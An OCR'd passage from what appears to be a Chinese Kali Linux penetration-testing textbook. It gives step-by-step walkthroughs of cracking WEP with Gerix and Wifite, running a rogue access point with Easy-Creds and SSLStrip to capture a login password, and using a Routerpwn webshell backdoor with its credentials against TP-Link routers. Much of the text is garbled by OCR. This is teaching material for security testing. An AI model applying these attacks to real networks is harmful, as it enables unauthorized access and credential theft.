13:13:45 - Fragmentation attack: Inject arp packet with mong 

13:14:14 - Fragmentation attack: ARP packet created E 
13:14:34 - Cracking WEP with aircrack launched (remember to save database s changes) 


F | . 
Gerix wa 
| A | security solutions 


图 9.29 破解 WEP 密 码 


(17) 在 该 界面 单 击 Aircrack-ng-Decrypt WEP password 按 钮 ， 将 显示 如 图 9.30 所 
示 的 界面 。 


aircrack-log.txt; read; " 
Aircrack-ng 1,2 betaz 


[00:03:28] Tested 134401 keys (got 15 


depth byteívote) 
7/ 32  EB(17920) OD(17664) 39(17664) 56(17664) E 
1  8C(18176) BF(17920) BB(17920) D7(17920) 2B( 
w 2 Ue ES 4F(16432) 51(18432) 84(18176) 8 
/1 9 7C(20736) 94(20224) 1C(19712) 8A(19712) EB(19458 
^ "CE 


E3(18944) 14(18588) 20(18B88) 3 ) SB(18588) 


Failed, Next try with 70000 Ys, 
Starting PTU attack with 20105 ivs. 
KEY FOUND! [ 61:62:63:64:65 ] (ASCII: abcde ) 
Decrypted correctly: 100x 





图 9.30 破解 结果 


(18) 从 该 界面 可 以 看 到 破解 WEP 加 密 密 码 共用 时 间 为 3 分 28 秒 。 当 抓 取 的 数据 包 
为 20105 时 ， 找 到 了 密码 ， 其 密码 为 abcde。 


9.3.2 使 用 Gerix 创 建 假 的 接 入 点 


使 用 Gerix 工 具 可 以 创建 和 建立 一 个 假 的 接 入 点 (AP) 。 设 置 一 个 假 的 访问 点 ， 可 
以 诱骗 用 户 访问 这 个 访问 点 。 在 这 个 时 代 ， 人 们 往往 会 为 了 方便 而 这 样 做 。 连 接 开 
放 的 无 线 授 入 点 ， 可 以 快速 及 方便 地 发 送 电 子 邮 件 或 登录 社交 网 络 。 下 面料 介绍 以 
WEP 加 密 的 无 线 网 络 为 例 ， 创 建 假 手 人 点 。 

使 用 Gerix 工 具 创 建 假 接 和 点。 具体 操作 步骤 如 下 所 示 。 


(1) 和 启动 Gerix 工 具 。 执 行 命令 如 下 所 示 : 


root@kali:/usr/share/gerix-wifi-cracker# python gerix.py 


(2) 切换 到 Configuration 选 项 卡 。 在 该 界面 选择 无 线 接口 ， 单 击 Enable/Disable 
Monitor Mode 按 钮 。 当 监听 模式 成 功 被 启动 后 ， 单 击 Select Target Network FEY 
Rescan Networks 按 钮 。 


(3) 在 扫描 到 的 所 有 网 络 中 ， 选 择 WEP 加 密 的 网 络 。 然 后 单 击 Fake AP 选项 卡 ， 
将 显示 如 图 9.31 所 示 的 界面 。 
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Gerix wifi cracker 


L Welcome | Configuration | WEP | WPA Fake ke AP | Cracking | Database Database | Credits 








Welcome in Fake Access Point Control Panel 
Create Fake AP 


E 
Access point ESSID: 


Access point channel: 


Cryptography tags Key in Hex (Ex. eraser or aan 


O WEP (€ None © WPA © WPA2 [ 
aabbccddee 

















WPA/WPA2 types 
* WEP40 © TKIP O WRAP 


Options 
[] AdHoc mode [ | Hidden SSID [| Disable broadcast probes [ | Respond to all i 


17:24:49 - database reloaded: /root/.gerix-wifi-cracker/key-database.db [Success] 


Gerix IT . 55555. 





图 9.31 Fake AP 界面 


(4) 从 该 界面 可 以 看 到 默认 的 接 人 点 ESSID 为 honeypot。 现 在 将 honeypot 修 改 为 
personalnetwork, 同 祥 将 攻击 的 无 线 接口 的 channel 也 要 修改 。 修 改 后 如 图 9.32 所 
"ho 
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Gerix wifi cracker bec zal 


Welcome Configuration WEP WPA | Fake AP Cracking Database | Credits | 





Welcome in Fake Access Point Control Panel 


Create Fake AP 
Access point channel: 
1 
Cryptography tags Key in Hex (Ex. aabbccddee) or Empty: 
[] WEP @ None © WPA © WPA2 
WPA/WPA2 types 
® WEP40 O TKIP © WRAP O CCMP © WEP1¢ 
Options 


O AdHoc mode O Hidden SSID [ Disable broadcast probes (| Respond to all 











Start Fake Access Point 
= 
g > 
13:19:52 - Crac king WEP with aircrack launched (remember to save database's changes) 
13:25:52 - Cracking WEP with aircrack launched (remember to save database's changes) 
13:49:50 - Cracking WEP with aircrack launched (remember to save database's changes) 
13:52:17 - Cracking WEP with aircrack launched (remember to save database's changes) 


Gerix IT 5555. 








9.32 创建 Fake AP 


(5) 以 上 信息 设置 完 后 ， 其 他 配置 保持 默认 设置 。 然 后 单 击 Start Fake Access 
Point 按 振 ， 交 显示 如 图 9.33 所 示 的 界面 。 
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bash -c "airbase-ng -e personalnetwork -c 1 -w aab 





9.33 启动 假 接 入 点 
(6) 当 有 用 户 连接 创建 的 personalnetwork AP 时 ， 该 界面 会 输出 如 下 所 示 的 信 


/NO 


17:32:34 Client 18:DC:56:F0:62:AF associated(WEP) to ESSID: "persor 


| 


以 上 信息 表示 ，MAC 地 址 18:DC:56:F0:62:AF 的 AP 正在 连接 personalnetwork。 





9.4 使 用 Wifite 破 解 无 线 网 络 


一 些 破 解 无 线 网 络 程序 是 使 用 Aircrack-ng 工 具 集 ， 并 添加 了 一 个 图 形 界面 或 使 用 文 
本 菜单 的 形式 来 破解 无 线 网 络 。 这 使 得 用 户 使 用 它们 更 容易 ， 而 且 不 需要 记 住 任 何 
命令 。 本 节 将 介绍 使 用 命令 行 工 具 Wifite， 来 扫 摘 并 攻击 无 线 网 络 。 


(1) 启动 wifite。 执 行 命令 如 下 所 示 : 
root@kali:~# wifite 
". WiFite v2 (r85) 
os rem Dom s ; automated wireless auditor 
aP EA E . designed for Linux 
[*] scanning for wireless devices... 

[+] enabling monitor mode on wlanO... done 


[+] initializing scan (monO), updates at 5 sec intervals, CTRL+C when ready. 
[0:00:03] scanning wireless networks. 0 targets and 0 clients found 


(2) (Fibs fH, TEX SAU RPA A. : 


NUM ESSID CH ENCR POWER WPS? CLIENT 
1 yzty 11 WPA2 59db wps client 
2 Test 1 WEP Sidb wps client 
3 TP-LINK D7118A 1 WPA2 35db wps 
4 CMCC-AUTO 1 WPA2 34db no 
2 CMCC-AUTO 1 WPA2 32db no client 
6 CMCC-AUTO 11 WPA2 29db no 
7 TP-LINK 1C20FA 5 WPA 28db wps 
8 CMCC-AUTO 11 WPA2 28db no 
9 CMCC-AUTO 6 — WPA2 28db no 

10 CMCC-LIU WPA2 28db wps 


12 CMCC-AUTO WPA2 27db no client 
13 Tenda 462950 WPA 26db no 
[+] select target numbers (1-13) separated by commas, or ‘all’: 


从 以 上 信息 中 ， 可 以 看 到 扫 挡 到 13 个 无 线 氢 人 氮 。 


(3) 选择 攻击 的 目标 。 这 里 选择 第 二 个 无 线 接 入 点 ， 它 是 使 用 WEP 方 式 加 密 的 。 
所 以 ， 应 该 比较 容易 攻击 ， 如 下 所 示 : 


6 

11 TP-LINK ZLICE 9 WPA2 27db wps 
6 
4 


[+] select target numbers (1-13) separated by commas, or ‘all': 2 

[+] 1 target selected. 

[0:10:00] preparing attack "Test" (14:E6:E4:AC:FB:20) 
[0:10:00] attempting fake authentication (5/5)... failed 
[0:10:00] attacking "Test" via arp-replay attack 
[0:09:06] started cracking (over 10000 ivs) 

[0:09:00] captured 12492 ivs @ 418 iv/sec 
[0:09:00] cracked Test (14:E6:E4:AC:FB:20)! key: "6162636465" 
[+] 1 attack completed: 
[+] 1/1 WEP attacks succeeded 

cracked Test (14:E6:E4:AC:FB:20), key: "6162636465" 
[+] disabling monitor mode on mono... done 
[+] quitting 


De Ee 


从 以 上 输出 信息 中 ， 可 以 看 到 攻击 成 功 。 其 中 ，Test 无 线 接 入 点 的 密码 是 
6162636465。 


9.5 使 用 Easy-Creds 工 具 攻 击 无 线 网 络 


Easy-Creds 是 一 个 菜单 式 的 破解 工具 。 该 工具 允许 用 户 打开 一 个 无 线 网 卡 ， 并 能 实 
现 一 个 无 线 接 入 点 攻击 平台 。Easy-Creds 可 以 创建 一 个 欺骗 访问 点 ， 并 作为 一 个 中 
闻 人 攻击 类 型 运行 ， 户 的 数据 流 和 账户 信息 。 它 可 以 从 SSL 加 密 数 据 中 
恢复 账户 。 本 节 将 介绍 使 用 Easy-Creds 工 具 攻 击 无 线 网 络 。 


Easy-Creds 是 BackTrack5 中 的 一 部 分 。 在 Kali 中 ， 黑 认 没 有 安装 该 工具 。 所 以 ， 
要 先 安装 Easy-Creds 工 具 才 可 使 用 。 


【实例 9-3】 安 装 Easy-Creds 工 具 。 具 体操 作 步 骤 如 下 所 示 。 


(1) 从 https://github.com/brav0hax/easy-creds 网 站 下 载 Easy-Creds 软 件 包 ， 其 软 
件 包 名 为 easy-creds-master.zip。 


(2) FRR PRYOR. Tea RAM : 


root@localhost:~# unzip easy-creds-master.zip 
Archive: easy-creds-master.zip 
bf9 foocosbie26d8ffA44ef27c7bcf59d3122ebcc 
creating: easy-creds-master/ 
inflating: easy-creds-master/README 
inflating: easy-creds-master/definitions.sslstrip 
inflating: easy-creds-master/easy-creds.sh 
inflating: easy-creds-master/installer.sh 


从 输出 的 信息 中 ， 可 以 看 到 Easy-Creds 软 件 包 被 解压 到 easy-creds-master 文 件 
中 。 从 以 上 信息 中 ， 可 以 看 到 在 easy-creds-master 文 件 中 有 一 个 installer.sh 文 件 ， 
该 文件 就 是 用 来 安装 Easy-Creds 软 件 包 的 。 


(3) 安装 Easy-Creds 软 件 包 。 在 安装 Easy-Creds 软 件 包 之 前 ， 有 一 些 依赖 包 需 要 
安装 。 这 些 依赖 包 ， 可 以 参考 easy-creds-master 文 件 中 的 README 文 件 安装 相关 
的 依赖 包 。 然 后 ， 安 装 Easy-Creds 包 。 执 行 命 爷 如 下 所 示 : 


root@kali:~# cd easy-creds/ 
root@kali:~/easy-creds# ./installer.sh 


Hehe Tis TH Phe Tile Tile Tile Phe This dH 
eee ae HI eec | ee me | | ee meme E |e T 
| 
Version 3.7 - Garden of Your Min 

Installer 


Please choose your OS to install easy-creds 
1\. Debian/Ubuntu and derivatives 

2N. Red Hat or Fedora 

3\. Microsoft Windows 

4N. Exit 

Choice: 


以 上 信息 显示 了 ， 安 装 easy-creds 的 操作 系统 菜单 。 


(4) 这 里 选择 安装 到 Debian/Ubuntu， 输 入 编号 1， 闻 显示 如 下 所 示 的 信息 : 


Choice: i 


He THe HS Tily He [ilc Tite Pie The LIES I| 
LE PIT ETT ETT PTT TT PTT ETT EIT ETT I 
|7__\|Z__N\|/7__N|7Z__N\|7__N\|Z__N\|7__N\] 7__\|]7__\|7__\ | 
Version 3.7 - Garden of Your Min 

Installer 


Please provide the path you'd like to place the easy-creds folder. 
[^] Installing pre-reqs for Debian/Ubuntu.. 
[*] Running 'updatedb' 
[-] cmake is not installed, will attempt to install... 
[+] cmake was successfully installed from the repository. 
[+] I found gcc installed on your system 


[+] I found g++ installed on your system 

[+] I found subversion installed on your system 
[+] I found wget installed on your system 

[+] I found libssl-dev installed on your system 
[+] I found libpcap0.8 installed on your system 
[+] I found libpcap0.8-dev installed on your system 
[+] I found libssl-dev installed on your system 
[+] I found aircrack-ng installed on your system 
[+] I found xterm installed on your system 

[+] I found sslstrip installed on your system 
[+] I found ettercap installed on your system 


[+] I found hamster installed on your system 

[-] ferret is not installed, will attempt to install... 

[^] Downloading and installing ferret from SVN 

[^] Installing the patched freeradius server... 

make[4]: Leaving directory ^/tmp/ec-install/freeradius-server-2.1.: 
make[3]: Leaving directory ^/tmp/ec-install/freeradius-server-2.1.: 
make[2]: Leaving directory ^"/tmp/ec-install/freeradius-server-2.1.: 
make[1]: Leaving directory ^/tmp/ec-install/freeradius-server-2.1.: 
[+] The patched freeradius server has been installed 

[+] I found asleap installed on your system 

[+] I found metasploit installed on your system 

[^] Running 'updatedb' again because we installed some new stuff 
„happy hunting! 





以 上 信息 显示 了 安装 Easy-Creds 包 的 详细 过 程 。 在 该 过 程 中 ， 会 检测 easy-creds 的 
依赖 包 是 否 都 已 安藤 。 如 果 没 有 安 疼 ， 此 过 程 中 会 安 丢 。Easy-Creds 软 件 包 安生 完 
成 后 ， 将 显示 happy hunting ! 信息 。 


【实例 9-4】 使 用 Easy-Creds 工 具 破 解 无 线 网 络 。 具 体操 作 步 又 如 下 所 示 。 
(1) 启动 Easy-Creds 工 具 。 执 行 命令 如 下 所 示 : 


root@localhost:~/easy-creds-master#./easy-creds.sh 


Version 3.8-dev - Garden of New Jersey 

At any time, ctrl+c to cancel and return to the main menu 
1N. Prerequisites & Configurations 

2N. Poisoning Attacks 

3N. FakeAP Attacks 

4N. Data Review 

SAT EXat 

q. Quit current poisoning session 

Choice: 


以 上 输出 的 信息 显示 了 Easy-Creds 工 具 的 攻击 菜单 。 
(2) 这 里 选择 俯 AP 攻 击 ， 输 入 编号 3。 将 显示 如 下 所 示 的 信息 : 


Choice: 3 


Version 3.8-dev - Garden of New Jersey 

At any time, ctrl+c to cancel and return to the main menu 
1N. FakeAP Attack Static 

2N. FakeAP Attack EvilTwin 

3N. Karmetasploit Attack 

4N. FreeRadius Attack 

5\. DoS AP Options 

6N. Previous Menu 

Choice: 


以 上 输出 信息 显示 了 伪 AP 攻 击 可 使 用 的 方法 。 
(3) 这 里 选择 使 用 静态 伪 AP 攻 击 ， 输 入 编号 1。 将 显示 如 下 所 示 的 信息 : 


lle Illa Ills Iy Il- Hle Iir Ille {Ile Iis I 


IL HL | HE | HE HL | HE | | I 
Ww WW Wh WOMAN X 
Version 3.8-dev - Garden of New Jersey 
At any time, ctrl+c to cancel and return to the main menu 


Would you like to include a sidejacking attack? [y/N]: N 


# 是 否 想 要 和 包括 支持 攻击 
Network Interfaces: 
ethÜ 00:0c:29:5f:34:4b IP:192.168.0.117 
wlanÜ 00:c1:40:76:05:6c 
Interface connected to the internet (ex. eth0): ethO # 选 择 要 连接 的 接口 
Interface Chipset Driver 
wlanÜ Ralink RT2870/3070 rt2800usb - [phyO] 
Wireless interface name (ex. wlanO): wlan0 # 设 置 无 线 接口 名 
ESSID you would like your rogue AP to be called, example FreeWiFi: wlan 

# 设 置 无 线 AP 的 ESSID 
Channel you would like to broadcast on: 4 ie i te AR ie 
[*] Your interface has now been placed in Monitor Mode 
mond Ralink RT2870/3070 rt2800usb - [phy0] 
Enter your monitor enabled interface name, (ex: monO): mong 

i Hu us rd de D m 
Would you like to change your MAC address on the mon interface? [y/N]: N 

HEU LB MAC 地 址 
Enter your tunnel interface, example at0: at # 设 置 隧道 接口 
Do you have a dhcpd.conf file to use? [y/N]: N HE d ER dhcpd.conf xc fF 
Network range for your tunneled interface, example 10.0.0.0/24: 10.0.0.0/24 

# 设 置 隧 所 接口 的 网 络 范 围 


The following DNS server IPs were found in your /etc/resolv.conf file: 
<> 192.168.0.1 

Enter the IP address for the DNS server, example 8.8.8.8: 192.168.0.1 3:935 DNS 服务 器 

[*] Creating a dhcpd.conf to assign addresses to clients that connect to us. 

[+] Launching Airbase with your settings. 

[*] Configuring tunneled interface. 

[+] Setting up iptables to handle traffic seen by the tunneled interface. 

[*] Launching Tail. 

[*] DHCP server starting on tunneled interface. 

[ ok ] Starting ISC DHCP server: dhcpd. 

[+] Launching SSLStrip... 

[*] Launching ettercap, poisoning specified hosts. 

[*] Configuring IP forwarding... 

[*] Launching URLSnarf... 

[*] Launching Dsniff... 


设置 完 以 上 的 信息 后 ， 将 会 自动 启动 一 些 程序 。 几 秒 后 ， 将 会 打开 几 个 有 效 窗口， 
如 图 9.34 所 示 。 


Airbase-NG 





DHCP: [34:00:59:EF :2F :F7] REQUEST 192.168.4,100 
DHCP: [34:C0:59:EF :2F :F7] REQUEST 10,0,0,103 
DHCP: [10,0,0,1] ACK : 10 meii resis a 
HITP : 151.255,61,56:80 -J| 
a-usiogninl,OLrpsnuz125ct- 
Piczo ek1d-648 





INS 132.168.0.1 
INFO: httpz//loain.live,cow/login.srf?w 
aL SHARPREDLureplushttps ://mail.live,.com/n 













= 


图 9.34 有 效 的 窗口 


(4) 当 有 用 户 连接 Wifi 接 入 点 时 ，Easy-Creds 将 自动 给 客户 端 分 配 一 个 I|P 地 址 ， 并 
且 能 够 访问 互联 网 。 如 果 在 互联 网 上 访问 一 个 安全 网 址 时 ， 该 工具 将 除去 SSL 并 删 
除 安全 连接 并 在 后 人 台 运 行 。 所 以 ， 能 够 读 取 到 客户 问 登 录 东 个 网 站 的 用 户 名 和 窗 
码 。 如 图 9.34 所 示 ， 捕 获 到 一 个 登录 





(5) 此 时 在 Easy-Creds 的 主 菜单 中 选择 效 据 恢 复 ， 输 入 编号 4， 如 下 所 示 : 


At any time, ctrl+c to cancel and return to the main menu 
1\. Prerequisites & Configurations 

2\. Poisoning Attacks 

3\. FakeAP Attacks 

4\. Data Review 

SAM EXIT 

q. Quit current poisoning session 

Choice: 4 


(6) 选择 数据 恢复 后 ， 将 显示 如 下 所 示 的 信息 : 


Version 3.8-dev - Garden of New Jersey 

At any time, ctrl+c to cancel and return to the main menu 
1\. Parse SSLStrip log for credentials 

2N. Parse dsniff file for credentials 

3N. Parse ettercap eci file for credentials 

4N. Parse freeradius attack file for credentials 

5N. Previous Menu 

Choice: 3 


以 上 信息 显示 了 可 用 证 书 的 方法 。 
(7) 这 里 选择 分 析 Ettercap eci 文 件 ， 输 入 编号 3， 将 显示 如 下 所 示 的 信息 : 


Version 3.8-dev - Garden of New Jersey 
At any time, ctrl+c to cancel and return to the main menu 


Ettercap logs in current log folder: 
/root/easy-creds-master/easy-creds-2014-07-24-1722/ettercap2014-07. 


Enter the full path to your ettercap.eci log file: 


4 EEE 


o a 


从 输出 信 Ab, 可 以 看 至 |Ettercap 日 志文 件 BRE [Bo 
办 三 


(8) 此 时 输入 ettercap.eci 日 志文 件 的 全 路 径 。 这 里 只 需要 通过 复制 并 粘贴 提供 的 
整个 Ettercap 路 径 融 可 以 了 。 如 下 所 示 : 





Enter the full path to your ettercap.eci log file: /root/easy-cred: 
(E == 
MAL PRE, TE mBE9.35Hrzm B5 I. 
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Ettercap Accounts 


etterlog N5-0,/,4.2 copyright 2001-2005 HLoR & Nab 


151,295,61,56 TCF 80 USER: testilive,com PHS5: qwert INFU; http 
://login,live,com/login,srf?wa-wsigninl.Üü&rpsnuv-12&ct-14062850821&rver-b, 4, 5455, 0 
&wup-HBI. S5SL. SHRARED&wreplu-https://mail,.live,.com/m/&1c-22052&1d-548 





E] 9.35 恢复 的 数据 
(9) 从 该 界面 可 以 清楚 的 看 到 ， 截 获 的 客户 闫 用 户 信息 及 登录 的 网 站 。 
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9.6 在 树 莓 派 上 破解 无 线 网 络 


大 部 分 的 命令 可 以 正常 的 运行 在 BackTrack5 或 Kali 上 。 在 Kali 上 可 以 实现 的 无 线 活 
透 测 试 ， 在 树 答 派 上 也 可 以 运行 。 在 第 1 章 中 介绍 了 在 树 董 派 上 安装 Kali Linux 操 作 
系统 ， 下 面料 介绍 在 树 每 派 上 实现 无 线 攻 击 。 


(1) 在 树 答 派 上 使 用 ifconfig 命 全 查看 无 线 网 卡 是 否 亿 识别。 执行 命 分 如 下 所 示 : 


root@kali:~# ifconfig 
ethO Link encap:Ethernet HWaddr 00:0c:29:7a:59:75 
inet addr:192.168.0.112 Bcast:192.168.0.255 Mask: 255,255,255 
inet6 addr: fe80::20c:29ff:fe7a:5975/64 Scope:Link 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 
RX packets:240510 errors:0 dropped:0 overruns:0 frame:0 
TX packets:130632 errors:0 dropped:0 overruns:O carrier:0 
collisions:0 txqueuelen: 1000 
RX bytes:275993519 (263.2 MiB) TX bytes:26073827 (24.8 MiB) 
lo Link encap:Local Loopback 
inet addr:127.0.0.1 Mask:255.0.0.0 
inet6 addr: ::1/128 Scope:Host 
UP LOOPBACK RUNNING MTU:65536 Metric:1 
RX packets:1706270 errors:0 dropped:0 overruns:0 frame:0 
TX packets:1706270 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen:0 
RX bytes: 250361463 (238.7 MiB) TX bytes:250361463 (238.7 MiB 
wlanO Link encap:Ethernet HWaddr 22:34:f7:f6:c1:dO 
UP BROADCAST MULTICAST MTU:1500 Metric:1 
RX packets:0 errors:0 dropped:0 overruns:0 frame:0 
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen: 1000 
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) 


从 输出 的 信息 中 ， 看 到 有 一 个 名 为 wlan0 的 接口 。 这 表示 无 线 网 卡 已 被 识别 。 如 果 


没有 看 到 类 似 信 息 ， 执 行 如 下 命 分 启动 无 线 网 络 ， 如 下 所 示 : 


root@kali:~# ifconfig wlanO up 


(2) 查看 无 线 网 卡 信 息 。 执 行 命令 如 下 所 示 : 


root(@kali:~# iwlist wlan scanning 
wlanQ Scan completed : 
Cell 01 - Address: 14:E6:E4:AC:FB:20 
Channel:1 
Frequency:2.412 GHz (Channel 1) 
Quality=62/70 Signal level=-48 dBm 
Encryption key:on 
ESSID:"Test" 
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s 
9 Mb/s: 12 Mb/s: 18 Mb/s 
Bit Rates:24 Mb/s: 36 Mb/s; 48 Mb/s: 54 Mb/s 
Mode:Master 
Extra:tsf=Q000000339efb6a2 
Extra: Last beacon: 46ms ago 
IE: Unknown: 000454657374 
IE: Unknown: 010882848B960C 121824 


IE: Unknown: 030101 
IE: Unknown: 0706555320010D 14 
IE: Unknown: 2A0100 
IE: IEEE 802.11iWPA2 Version 1 

Group Cipher : CCMP 

Pairwise Ciphers (1) : CCMP 

Authentication Suites (1) : PSK 
IE: Unknown: 32043048606C 
IE: Unknown: 2D1A2CO0003FFO00000000000000000000000000000 
0000000000000000 
IE: Unknown: 337A2CO003F FOO00000000000000000000000000000 
0000000000000 
IE: Unknown: 3D16010011000000000000000000000000000000000 
00000 
IE: Unknown: 3416010011000000000000000000000000000000000 
00000 
IE: WPA Version 1 

Group Cipher : CCMP 

Pairwise Ciphers (1) : CCMP 

Authentication Suites (1) : PSK 
IE: Unknown: DD180050F2020101030003A4000027A4000042435E 
0062322F00 
IE: Unknown: DDOS00037F01010000FF7F 
IE: Unknown: DD800050F204104A0001101044000102103B0001031 
04700100000000000001000000014E6E44CFB201021000754502D4C 
494E4B10230009544C2D57523734304E10240003312E30104200033 
12E301054000800060050F204000110110018576972656C65737320 
4E20526F 757465722057523734304E 100800020086103C000101 

Cell 09 - Address: DA:64:C7:2F:AO:FF 

Channel:11 
Frequency:2.462 GHz (Channel 11) 
Quality=36/70 Signal level=-74 dBm 


以 上 输出 了 的 信息 显示 了 无 线 网 卡 的 相关 信息 。 如 网 卡 MAC 地 址 、 信 站 、 加 密 、 速 
率 和 模式 等 。 


(3) 启动 无 线 网 卡 为 监听 模式 。 执 行 命 分 如 下 所 示 : 
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root@kali:~# airmon-ng start wlan 

Found 3 processes that could cause trouble. 

If airodump-ng, aireplay-ng or airtun-ng stops working after 
a short period of time, you may want to kill (some of) them! 


-& 
PID Name 

2618 NetworkManager 

2870 wpa_supplicant 

27052 dhclient 

Interface Chipset Driver 

wlanÜ Ralink RT2870/3070 rt2800usb - [phy16] 


(monitor mode enabled on mon0) 


从 输出 的 信息 中 ， 可 以 看 到 无 线 接口 wlan0 已 启动 监听 模式 ， 其 监听 接口 为 non0。 


现在 ， 束 可 以 使 用 该 接口 捕获 无 线 管 理 与 控制 帧 。 


在 树 等 派 中 ， 可 以 使 用 Wireshark 的 命 全 行程 序 tcpdump 或 tshark 来 捕获 数据 。 如 果 


不 喜欢 在 命令 行 操 作 的 话 ， 可 以 使 用 Wireshark 的 图 形 界面 来 实现 。 
(1) 启动 Wireshark 工 具 。 执 行 命 爷 如 下 所 示 : 


root@kali:~# wireshark & 


(2) 在 Wireshark 的 接口 列表 中 选择 mon0 接 口 ， 并 单 击 Start 按 钮 ， 如 图 9.36 所 
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9.6 在 树 每 派 上 破解 无 线 网 络 


428 


图 9.37 捕获 的 无 线 数据 包 


(4) 在 该 界面 可 以 看 到 106 帧 是 客户 疹 发 送 Probe Reques 包 ， 请 求 连 接 路 由 器 。 
107 帧 路 由 器 发 送 Probe Response 包 ， 响 应 了 客户 端的 请 求 。 


从 以 上 信息 中 ， 可 以 看 到 使 用 隐藏 SSID 并 不 意味 着 是 一 个 安全 的 网 络 。 在 
Wireshark 中 ， pe e pins 最 有 效 的 方法 。 这 里 可 以 使 用 airodump 命 
4S MT — T 7 BEA ES, 到 连接 该 接 入 点 的 任何 设备 MAC 地 址 。 语 法 格式 如 下 


PAAR : 


airodump-ng -c 无 线 AP 的 信道 -a bssid(AP 的 MAC 地 址 ) mono 


当成 功 获取 客户 痛 的 MAC 地 址 时 ， 用 户 只 需 使 用 macchanger 命 令 将 目 己 无 线 网 卡 
的 MAC 地 址 修改 为 客户 端的 MAC 地 址 ， 即 可 成 功 连接 到 网 络 。 


【实例 9-5】 使 用 Fern WiFi Cracker 工 具 攻 击 ， 在 树 莓 派 上 攻击 WEP 和 WPA/WPA2 
TAM, BREED eA RH. 


(1) 启动 Fern WiFi Cracker 工 具 。 执 行 命 令 如 下 所 示 : 


root@kali:~# fern-wifi-cracker 


执行 以 上 命令 后 ， 将 显示 如 图 9.38 所 示 的 界面 。 














Fern WIFI Cracker 1.9 
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# 9.38 Fern WiFi Cracker} RE 


(2) 在 该 界面 选择 无 线 网 络 接口 ， 并 单 击 Scan for Access points 图 标 扫 描 无 线 网 


络 ， 


如 图 9.39 所 示 。 
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(3) 在 该 界面 选择 WiFi WEP 或 WiFi WPA Ar, REX zn I E 9.408 RNR. 





Attack Panel 








9.40 选择 攻击 目标 


(4) 在 该 界面 选择 攻击 目标 。 然 后 单 击 WiFi Attack 按 钮 ， 开 始 攻 击 ， 如 图 9.41 所 
/J\o 


Attack Panel 





图 9.41 正在 攻击 


(5) 从 该 界面 可 以 看 到 ， 已 捕获 到 6556 个 数据 包 。 当 捕获 到 大 约 2 万 个 包 时 ， 将 会 
破解 出 密码 。 但 是 此 过 程 的 时 间 相 当 长 ， 需 要 耐心 的 等待 。 


9.7 Nem Aes 


前 面 介 绍 的 各 种 工具 ， 都 是 通过 直接 破解 密码 ， 来 连接 到 无 线 网 络 。 由 于 在 一 个 无 
线 网络 环 境 的 所 有 设 各 中， 路 由 器 是 最 重要 的 设备 之 一 。 通 党 用户 为 了 保护 路 由 器 
的 安全 ， 通 常会 设置 一 个 比较 复 灯 的 密码 。 其 至 一 些 用 户 可 能 会 使 用 路 由 器 的 默认 
用 户 名 和 密码 。 但 是 ， 路 由 器 本 身 就 存在 一 些 漏洞 。 如 果 用 户 觉得 对 复杂 的 密码 着 
手 可 能 不 太 容 易 。 这 时 候 ， 束 可 以 利用 路 由 器 自身 存在 的 漏洞 实施 攻击 。 本 节 将 介 
绍 使 用 Routerpwn 工 具 实 施 攻 击 路 由 器 。 


Routerpwn 可 能 是 使 用 起 来 最 容易 的 一 个 工具 。 它 用 来 查看 路 由 器 的 漏洞 。 
Routerpwn 不 包括 在 Kali 中 ， 它 只 是 一 个 网 站 。 其 官网 地 址 为 
http://routerpwn.com/。 该 网 站 提供 的 漏洞 涉及 很 多 厂 丙 的 路 由 器 ， 如 图 9.42 所 示 。 


2Wire Comtrend Netgear TRENDnet 
sCom DD-Wrt Pirelli Ubee 
dolls RuggedCom Ubiquiti 
Alcatel Sagem Unicorn 
EasyBox Seagate UTStarcom 
Fibrehome Siemens Xavi 
Freebox Sitecom ZyXEL 


Lucent 
Alpha 
Asmax 


Asus Huawei SMC ZTE 


Belkin MiFi Thomson Zoom 
Cisco Motorola TP-Link 





9.42 Routerpwn 主 页 面 


从 该 界面 可 以 看 到 有 很 多 厂 丙 的 路 由 器 ， 如 国内 党 用 的 D-Link、Huawei、Netgear 
和 TP-Link 等 。 根 据 目 己 的 目标 路 由 器 选择 相应 生产 三 两 ， 这 里 选择 TP-Link， 将 显 
示 如 图 9.43 所 示 的 界面 。 


TP-LINK 


TD-881/7, TD-W8901G, WOR/40N, WR/43ND, WR&42ND, WA-301ND, 
WR941N, WR941ND, WR1043ND, WR2543ND, MR3220, MR3020, 
WRS844N, TD-8840T , WDR740N, WDR740D 


05/25/12 [*] TP-Link WOR /40ND/WDRS40N - Directory Traversal [SET IF] 
011414 [+] TD-8840T - Reset Password to Blank [SET IP] 
08/06/13 [*] WR1043ND denial of service [SET IP] 
08/06/13 [+] WR1043ND enable root filsystem on FTP CSRF [SET IP] 
04/06/13 [+] TD-6817 TD-W#8901G blank admin password CSRF [SET IP] 


05/26/12 [*] Webshell backdoor (user: osteam password: 5up) [SET IP] 





89.43 支持 的 型 号 及 漏洞 


从 该 界面 可 以 看 到 支持 有 十 六 种 型 号 的 TP-LINK 路 由 器 及 可 利用 的 漏洞 。 在 路 由 器 
漏洞 列表 中 显示 了 漏洞 日 期 、 漏 洞 描述 信息 和 一 个 选项 [SET IP]。 该 选项 是 用 来 设 
置 目 标 路 由 器 的 IP。 


【实例 9-6】 利 用 Webshell backdoor 漏 洞 ， 获 取 一 个 远程 路 由 器 〈 本 例 中 路 由 器 IP 
地 址 为 192.168.0.1) 命令 行 。 具 体操 作 步 又 如 下 所 示 。 


(1) 在 图 9.43 中 单 击 [SET IP] 搜 和 钮 ， 将 弹出 一 个 对 话 框 ， 如 图 9.44 所 示 。 


| = x 
routerpwn.com 上 的 网 页 显示 : 


IP: 


49.44 输入 目标 路 由 需 IP 地 址 


(2) 在 该 对 话 框 中 ， 输 入 要 攻击 的 路 由 器 的 IP 地 址 。 然 后 单 击 “ 确 定 ? 按 钮 ， 将 弹出 
如 图 9.45 所 示 的 对 话 框 。 
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Set T E 3 x | 








ERSS ER € //192.168.0.1:80 SE FHP*1t8; A RAPERE 
RSRS : TP-LINK Wireless N Router WR1041N, 








9.45 登录 路 由 器 对 话 框 


(3) 在 该 界面 输入 登录 路 由 器 的 用 户 名 和 密码 ， 一 般 路 由 器 默认 的 用 户 名 和 密码 
是 admin。 然 后 单 击 "登录 "按钮 ， 将 显示 如 图 9.46 所 示 的 界面 。 
